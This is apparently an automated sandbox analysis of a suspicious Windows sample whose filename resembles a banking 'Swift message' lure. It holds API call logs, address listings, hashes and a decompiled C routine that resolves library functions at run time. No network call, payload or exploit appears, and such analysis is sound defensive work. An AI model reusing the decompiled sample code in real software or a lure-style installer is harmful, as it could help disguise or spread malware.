0x00404fe5
0x00404fec
0x0040505d
0x00405065
0x0040506d
0x0040506d
0x00405076
0x00405078
0x0040507f
0x00405082
0x00405082
0x00405088
0x0040508f
0x00405092
0x00405092
0x00405098
0x0040509e
0x004050a4
0x004050a4
0x004050b1
0x00405207
0x0040520e
0x0040522b
0x00405231
0x00405243
0x00405243
0x00000000
0x004050b7
0x004050b9
0x004050be
0x004050c3
0x004050c8
0x004050ca
0x004050ca
0x004050cb
0x004050cc
0x004050ce
0x004050ce
0x004050d6
0x00405117
0x00405119
0x00405129
0x0040512c
0x00405131
0x00405138
0x0040513b
0x004051dd
0x004051e3
0x004051f1
0x00405202
0x00405202
0x00000000
0x004051f1
0x00405141
0x00405144
0x0040514a
0x0040514f
0x00405151
0x00405153
0x00405159
0x00405160
0x00405165
0x0040516c
0x0040516f
0x0040516f
0x00405176
0x00405182
0x00405186
0x00405188
0x00405188
0x00405178
0x0040517a
0x0040517a
0x004051a8
0x004051b4
0x004051c3
0x004051c3
0x004051c5
0x004051c8
0x004051d1
0x00000000
0x004050d8
0x004050e3
0x004050e6
0x004050eb
0x004050ed
0x004050f1
0x00405101
0x0040510b
0x0040510d
0x00405110
0x00000000
0x00000000
0x00000000
0x00000000
0x004050f3
0x004050f3
0x004050f9
0x004050fb
0x004050fb
0x004050fc
0x004050fd
0x00000000
0x004050f3
0x004050d6
0x004050b1
0x00404ff4
0x00000000
0x0040500a
0x00405014
0x00405019
0x00000000
0x00000000
0x0040502b
0x00405030
0x0040503c
0x0040503c
0x0040503e
0x0040504d
0x0040504f
0x00405053
0x00405056
0x00000000
0x00405056
0x00404ff4
0x00404cb4
0x00404cb9
0x00404cc2
0x00404cc9
0x00404cd7
0x00404ce2
0x00404ce8
0x00404cf6
0x00404d0a
0x00404d0f
0x00404d1c
0x00404d21
0x00404d37
0x00404d48
0x00404d55
0x00404d55
0x00404d58
0x00404d5e
0x00404d60
0x00404d63
0x00404d68
0x00404d6d
0x00404d6f
0x00404d6f
0x00404d8f
0x00404d8f
0x00404d91
0x00404d92
0x00404d97
0x00404d9a
0x00404d9d
0x00404da1
0x00404da6
0x00404dab
0x00404daf
0x00404db4
0x00404db9
0x00404dbb
0x00404dc3
0x00404e8e
0x00404ea1
0x00000000
0x00404dc9
0x00404dcc
0x00404dcf
0x00404dd2
0x00404dd2
0x00404dd9
0x00404ddf
0x00404de2
0x00404de8
0x00404de9
0x00404dee
0x00404df7
0x00404dfe
0x00404e01
0x00404e04
0x00404e07
0x00404e43
0x00404e64
0x00404e6c
0x00404e45
0x00404e52
0x00404e52
0x00404e09
0x00404e0c
0x00404e1b
0x00404e25
0x00404e2d
0x00404e34
0x00404e3c
0x00404e3c
0x00404e07
0x00404e72
0x00404e73
0x00404e7f
0x00404e7f
0x00404e8c
0x00404ea7
0x00404eab
0x00404ec8
0x00404ecd
0x00000000
0x00404ead
0x00404eb2
0x00404ebb
0x00405245
0x00405257
0x00405257
0x00404eab
0x00000000
0x00404e8c
0x00404dc3

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C7A
GetDlgItem.USER32(?,00000408), ref: 00404C85
GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCF
LoadBitmapW.USER32(0000006E), ref: 00404CE2
SetWindowLongW.USER32(?,000000FC,0040525A), ref: 00404CFB
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0F
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D21
SendMessageW.USER32(?,00001109,00000002), ref: 00404D37
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D43
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D55
DeleteObject.GDI32(00000000), ref: 00404D58
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D83
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8F
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E25
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E50
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E64
GetWindowLongW.USER32(?,000000F0), ref: 00404E93
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA1
ShowWindow.USER32(?,00000005), ref: 00404EB2
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAF
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405014
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405029
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040504D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040506D
ImageList_Destroy.COMCTL32(?), ref: 00405082
GlobalFree.KERNEL32(?), ref: 00405092
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040510B
SendMessageW.USER32(?,00001102,?,?), ref: 004051B4
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C3
InvalidateRect.USER32(?,00000000,00000001), ref: 004051E3
ShowWindow.USER32(?,00000000), ref: 00405231
GetDlgItem.USER32(?,000003FE), ref: 0040523C
ShowWindow.USER32(00000000), ref: 00405243

Strings

, xrefs: 0040521B
M, xrefs: 00404E0C
N, xrefs: 00404EED

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
Instruction ID: ace54df752983209bd77257c2b819bbd2f8b8ae60686516a6448f39b7f2ae2b0
Opcode Fuzzy Hash: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
Instruction Fuzzy Hash: E50270B0900209EFDB109FA4DD85AAE7BB5FB84314F10817AF650BA2E1D7799D42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10001B18() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				WCHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				intOrPtr* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				void* _t246;
				struct HINSTANCE__* _t248;
				void* _t249;
				signed int _t251;
				short* _t253;
				signed int _t259;
				void* _t260;
				signed int _t263;
				signed int _t266;
				signed int _t267;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t278;
				void* _t282;
				struct HINSTANCE__* _t284;
				signed int _t287;
				void _t288;
				signed int _t289;
				signed int _t301;
				signed int _t302;
				signed short _t308;
				signed int _t309;
				WCHAR* _t310;
				WCHAR* _t312;
				WCHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t318;
				void* _t319;

				_t284 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t319 = 0;
				_v48 = 0;
				_t199 = E1000121B();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E1000121B();
				_t309 = E10001243();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t284 && _t319 == _t284) {
						break;
					}
					_t308 =  *_t309;
					_t287 = _t308 & 0x0000ffff;
					_t204 = _t287 - _t284;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t206 = _v56 - _t284;
						if(_t206 == 0) {
							__eflags = _t319 - _t284;
							 *_v28 = _t284;
							if(_t319 == _t284) {
								_t246 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t319 = _t246;
								 *(_t319 + 0x1010) = _t284;
								 *(_t319 + 0x1014) = _t284;
							}
							_t288 = _v36;
							_t43 = _t319 + 8; // 0x8
							_t208 = _t43;
							_t44 = _t319 + 0x808; // 0x808
							_t310 = _t44;
							 *_t319 = _t288;
							_t289 = _t288 - _t284;
							__eflags = _t289;
							 *_t208 = _t284;
							 *_t310 = _t284;
							 *(_t319 + 0x1008) = _t284;
							 *(_t319 + 0x100c) = _t284;
							 *(_t319 + 4) = _t284;
							if(_t289 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t316 = 0;
								GlobalFree(_t319);
								_t319 = E10001311(_v24);
								__eflags = _t319 - _t284;
								if(_t319 == _t284) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t240 =  *(_t319 + 0x1ca0);
									__eflags = _t240 - _t284;
									if(_t240 == _t284) {
										break;
									}
									_t316 = _t319;
									_t319 = _t240;
									__eflags = _t319 - _t284;
									if(_t319 != _t284) {
										continue;
									}
									break;
								}
								__eflags = _t316 - _t284;
								if(_t316 != _t284) {
									 *(_t316 + 0x1ca0) = _t284;
								}
								_t241 =  *(_t319 + 0x1010);
								__eflags = _t241 & 0x00000008;
								if((_t241 & 0x00000008) == 0) {
									_t242 = _t241 | 0x00000002;
									__eflags = _t242;
									 *(_t319 + 0x1010) = _t242;
								} else {
									_t319 = E1000158F(_t319);
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t301 = _t289 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									L28:
									lstrcpyW(_t208, _v44);
									L29:
									lstrcpyW(_t310, _v24);
									L39:
									_v12 = _v12 + 2;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t309 = _v12;
										continue;
									}
									break;
								}
								_t302 = _t301 - 1;
								__eflags = _t302;
								if(_t302 == 0) {
									goto L29;
								}
								__eflags = _t302 != 1;
								if(_t302 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t206 != 1) {
							goto L39;
						}
						_t248 = _v16;
						if(_v40 == _t284) {
							_t248 = _t248 - 1;
						}
						 *(_t319 + 0x1014) = _t248;
						goto L39;
					}
					_t249 = _t204 - 0x23;
					if(_t249 == 0) {
						__eflags = _t309 - _v52;
						if(_t309 <= _v52) {
							L15:
							_v32 = _t284;
							_v36 = _t284;
							goto L17;
						}
						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
						if( *((short*)(_t309 - 2)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t284;
						if(_v32 == _t284) {
							L40:
							_t251 = _v32 - _t284;
							__eflags = _t251;
							if(_t251 == 0) {
								__eflags = _t287 - 0x2a;
								if(_t287 == 0x2a) {
									_v36 = 2;
									L61:
									_t309 = _v12;
									_v28 = _v24;
									_t284 = 0;
									__eflags = 0;
									L62:
									_t318 = _t309 + 2;
									__eflags = _t318;
									_v12 = _t318;
									goto L63;
								}
								__eflags = _t287 - 0x2d;
								if(_t287 == 0x2d) {
									L131:
									__eflags = _t308 - 0x2d;
									if(_t308 != 0x2d) {
										L134:
										_t253 = _t309 + 2;
										__eflags =  *_t253 - 0x3a;
										if( *_t253 != 0x3a) {
											L141:
											_v28 =  &(_v28[0]);
											 *_v28 = _t308;
											goto L62;
										}
										__eflags = _t308 - 0x2d;
										if(_t308 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t253;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 = _t284;
										} else {
											 *_v28 = _t284;
											lstrcpyW(_v44, _v24);
										}
										goto L61;
									}
									_t253 = _t309 + 2;
									__eflags =  *_t253 - 0x3e;
									if( *_t253 != 0x3e) {
										goto L134;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t287 - 0x3a;
								if(_t287 != 0x3a) {
									goto L141;
								}
								goto L131;
							}
							_t259 = _t251 - 1;
							__eflags = _t259;
							if(_t259 == 0) {
								L74:
								_t260 = _t287 - 0x22;
								__eflags = _t260 - 0x55;
								if(_t260 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
									case 0:
										__ecx = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											L115:
											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
											if( *((intOrPtr*)(__edi + 2)) != __dx) {
												L120:
												 *__ecx =  *__ecx & 0x00000000;
												__ebx = E1000122C(_v24);
												goto L91;
											}
											L116:
											__eflags = __ax;
											if(__ax == 0) {
												goto L120;
											}
											__eflags = __ax - __dx;
											if(__ax == __dx) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__ax =  *__edi;
											 *__ecx =  *__edi;
											__ecx = __ecx + 1;
											__ecx = __ecx + 1;
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 2;
										__ebx = E1000121B();
										 &_v12 = E10001A9F( &_v12);
										__eax = E10001470(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(4);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push(4);
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x1018) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x1028) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E10001A9F( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
											_t133 = _v16 + 0x81; // 0x81
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x1030)) = 0;
											 *((intOrPtr*)(__edi + 0x102c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t262 =  *(_t319 + 0x1014);
										__eflags = _t262 - _v16;
										if(_t262 > _v16) {
											_v16 = _t262;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t262 - (_v36 == 3);
										if(_t262 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x102c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x1030; // 0x1030
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t263 = _t259 - 1;
							__eflags = _t263;
							if(_t263 == 0) {
								_v16 = _t284;
								goto L74;
							}
							__eflags = _t263 != 1;
							if(_t263 != 1) {
								goto L141;
							}
							_t266 = _t287 - 0x21;
							__eflags = _t266;
							if(_t266 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t267 = _t266 - 0x42;
							__eflags = _t267;
							if(_t267 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t319 + 0x1010;
									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t272 = _t267;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t273 = _t272 - 9;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(8);
								goto L56;
							}
							_t274 = _t273 - 4;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(4);
								goto L56;
							}
							_t275 = _t274 - 1;
							__eflags = _t275;
							if(_t275 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t275 != 0;
							if(_t275 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t278 = _t249 - 5;
					if(_t278 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t284;
						_v20 = _t284;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t284;
						goto L17;
					}
					_t282 = _t278 - 1;
					if(_t282 == 0) {
						_v32 = 2;
						_v8 = _t284;
						_v20 = _t284;
						goto L17;
					}
					if(_t282 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
					L161:
					return _t319;
				} else {
					_t216 =  *_t319 - 1;
					if(_t216 == 0) {
						_t178 = _t319 + 8; // 0x8
						_t312 = _t178;
						__eflags =  *_t312 - _t284;
						if( *_t312 != _t284) {
							_t217 = GetModuleHandleW(_t312);
							__eflags = _t217 - _t284;
							 *(_t319 + 0x1008) = _t217;
							if(_t217 != _t284) {
								L150:
								_t183 = _t319 + 0x808; // 0x808
								_t313 = _t183;
								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
								__eflags = _t218 - _t284;
								 *(_t319 + 0x100c) = _t218;
								if(_t218 == _t284) {
									__eflags =  *_t313 - 0x23;
									if( *_t313 == 0x23) {
										_t186 = _t319 + 0x80a; // 0x80a
										_t222 = E10001311(_t186);
										__eflags = _t222 - _t284;
										if(_t222 != _t284) {
											__eflags = _t222 & 0xffff0000;
											if((_t222 & 0xffff0000) == 0) {
												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t284;
								if(_v48 != _t284) {
									L157:
									_t313[lstrlenW(_t313)] = 0x57;
									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
									__eflags = _t220 - _t284;
									if(_t220 != _t284) {
										L145:
										 *(_t319 + 0x100c) = _t220;
										goto L161;
									}
									__eflags =  *(_t319 + 0x100c) - _t284;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t197 = _t319 + 4;
									 *_t197 =  *(_t319 + 4) | 0xffffffff;
									__eflags =  *_t197;
									goto L161;
								} else {
									__eflags =  *(_t319 + 0x100c) - _t284;
									if( *(_t319 + 0x100c) != _t284) {
										goto L161;
									}
									goto L157;
								}
							}
							_t225 = LoadLibraryW(_t312);
							__eflags = _t225 - _t284;
							 *(_t319 + 0x1008) = _t225;
							if(_t225 == _t284) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t319 + 0x808; // 0x808
						_t227 = E10001311(_t179);
						 *(_t319 + 0x100c) = _t227;
						__eflags = _t227 - _t284;
						goto L159;
					}
					_t228 = _t216 - 1;
					if(_t228 == 0) {
						_t176 = _t319 + 0x808; // 0x808
						_t229 = _t176;
						__eflags =  *_t229 - _t284;
						if( *_t229 == _t284) {
							goto L161;
						}
						_t220 = E10001311(_t229);
						L144:
						goto L145;
					}
					if(_t228 != 1) {
						goto L161;
					}
					_t80 = _t319 + 8; // 0x8
					_t285 = _t80;
					_t314 = E10001311(_t80);
					 *(_t319 + 0x1008) = _t314;
					if(_t314 == 0) {
						goto L160;
					}
					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
					_t89 = _t319 + 0x808; // 0x808
					_t220 =  *(_t314->i + E10001311(_t89) * 4);
					goto L144;
				}
			}

0x10001b20
0x10001b23
0x10001b26
0x10001b29
0x10001b2c
0x10001b2f
0x10001b32
0x10001b34
0x10001b37
0x10001b3c
0x10001b3f
0x10001b47
0x10001b4f
0x10001b51
0x10001b54
0x10001b5c
0x10001b5c
0x10001b61
0x10001b64
0x00000000
0x00000000
0x10001b6e
0x10001b71
0x10001b76
0x10001b78
0x10001beb
0x10001beb
0x10001beb
0x10001bef
0x10001bf2
0x10001bf4
0x10001c16
0x10001c18
0x10001c1b
0x10001c24
0x10001c2a
0x10001c2c
0x10001c32
0x10001c32
0x10001c38
0x10001c3b
0x10001c3b
0x10001c3e
0x10001c3e
0x10001c44
0x10001c46
0x10001c46
0x10001c48
0x10001c4b
0x10001c4e
0x10001c54
0x10001c5a
0x10001c5d
0x10001c81
0x10001c84
0x00000000
0x00000000
0x10001c87
0x10001c89
0x10001c97
0x10001c9a
0x10001c9c
0x00000000
0x00000000
0x00000000
0x00000000
0x10001c9e
0x10001c9e
0x10001c9e
0x10001ca4
0x10001ca6
0x00000000
0x00000000
0x10001ca8
0x10001caa
0x10001cac
0x10001cae
0x00000000
0x00000000
0x00000000
0x10001cae
0x10001cb0
0x10001cb2
0x10001cb4
0x10001cb4
0x10001cba
0x10001cc0
0x10001cc2
0x10001cd6
0x10001cd6
0x10001cd8
0x10001cc4
0x10001cca
0x10001ccd
0x10001ccd
0x00000000
0x10001c5f
0x10001c5f
0x10001c5f
0x10001c60
0x10001c68
0x10001c6c
0x10001c72
0x10001c76
0x10001cde
0x10001ce1
0x10001ce5
0x10001d70
0x10001d74
0x10001b59
0x00000000
0x10001b59
0x00000000
0x10001d74
0x10001c62
0x10001c62
0x10001c63
0x00000000
0x00000000
0x10001c65
0x10001c66
0x00000000
0x00000000
0x00000000
0x10001c66
0x10001c5d
0x10001bf7
0x00000000
0x00000000
0x10001c00
0x10001c03
0x10001c10
0x10001c10
0x10001c05
0x00000000
0x10001c05
0x10001b7a
0x10001b7d
0x10001bce
0x10001bd1
0x10001be3
0x10001be3
0x10001be6
0x00000000
0x10001be6
0x10001bd3
0x10001bd8
0x00000000
0x00000000
0x10001bda
0x10001bdd
0x10001ced
0x10001cf0
0x10001cf0
0x10001cf2
0x10002048
0x1000204b
0x100020b2
0x10001d60
0x10001d63
0x10001d66
0x10001d69
0x10001d69
0x10001d6b
0x10001d6c
0x10001d6c
0x10001d6d
0x00000000
0x10001d6d
0x1000204d
0x10002050
0x10002057
0x10002057
0x1000205b
0x1000206f
0x1000206f
0x10002072
0x10002076
0x100020be
0x100020c1
0x100020c5
0x00000000
0x100020c5
0x10002078
0x1000207c
0x00000000
0x00000000
0x1000207e
0x10002085
0x10002085
0x1000208b
0x1000208e
0x100020aa
0x10002090
0x10002099
0x1000209c
0x1000209c
0x00000000
0x1000208e
0x1000205d
0x10002060
0x10002064
0x00000000
0x00000000
0x10002066
0x00000000
0x10002066
0x10002052
0x10002055
0x00000000
0x00000000
0x00000000
0x10002055
0x10001cf8
0x10001cf8
0x10001cf9
0x10001e29
0x10001e29
0x10001e2e
0x10001e31
0x00000000
0x00000000
0x10001e3e
0x00000000
0x10001fe5
0x10001fe8
0x10001feb
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x10001ff8
0x10001ff8
0x10001ffc
0x10002014
0x10002017
0x10002021
0x00000000
0x10002021
0x10001ffe
0x10001ffe
0x10002001
0x00000000
0x00000000
0x10002003
0x10002006
0x10002008
0x10002009
0x10002009
0x10002009
0x1000200a
0x1000200d
0x10002010
0x10002011
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x00000000
0x10001ff6
0x00000000
0x10001e85
0x00000000
0x00000000
0x10001e91
0x00000000
0x00000000
0x10001e78
0x10001e7c
0x10001e80
0x00000000
0x00000000
0x10001fb6
0x10001fba
0x00000000
0x00000000
0x10001fc0
0x10001fc9
0x10001fd0
0x10001fd8
0x00000000
0x00000000
0x10001f53
0x10001f53
0x00000000
0x00000000
0x10001e9a
0x00000000
0x00000000
0x10002040
0x00000000
0x00000000
0x10002030
0x00000000
0x00000000
0x10002034
0x00000000
0x00000000
0x1000203c
0x00000000
0x00000000
0x10001f76
0x00000000
0x00000000
0x10001f5b
0x10001f5d
0x00000000
0x00000000
0x10001f7e
0x00000000
0x00000000
0x10001f63
0x00000000
0x00000000
0x10001f67
0x00000000
0x00000000
0x10002038
0x10002042
0x10002042
0x00000000
0x00000000
0x10001f86
0x10001f8a
0x10001f8f
0x10001f92
0x10001f93
0x10001f96
0x10001f9c
0x10001f9c
0x00000000
0x00000000
0x10002028
0x00000000
0x00000000
0x10001f6b
0x10001f6e
0x10001f70
0x00000000
0x00000000
0x10001ea1
0x10001ea1
0x00000000
0x00000000
0x10001f7a
0x10001f80
0x10001f80
0x10001ea3
0x10001ea3
0x10001ea6
0x10001ead
0x10001eb0
0x10001eb2
0x10001eb4
0x10001eb5
0x10001eb9
0x10001ebc
0x10001ec2
0x10001ec8
0x10001ec8
0x10001eca
0x10001eca
0x10001ecd
0x10001ed3
0x10001ed5
0x10001ed9
0x10001ede
0x10001ede
0x10001ee0
0x10001ee0
0x10001ee3
0x10001ee6
0x10001eef
0x10001ef5
0x10001ef8
0x10001ef8
0x10001efa
0x10001efd
0x10001f03
0x00000000
0x10001f03
0x10001ec4
0x10001ec6
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e45
0x10001e4b
0x10001e4e
0x10001e50
0x10001e50
0x10001e53
0x10001e57
0x10001e64
0x10001e66
0x10001e6c
0x10001e6c
0x10001e6c
0x00000000
0x00000000
0x10001fa4
0x10001fa8
0x10001fad
0x10001fb0
0x10001f09
0x10001f09
0x10001f0b
0x00000000
0x00000000
0x10001f11
0x10001f11
0x10001f15
0x10001f1c
0x10001f40
0x10001f40
0x10001f44
0x10001f46
0x10001f49
0x10001f49
0x10001f4c
0x10001f4c
0x00000000
0x10001f44
0x10001f21
0x10001f24
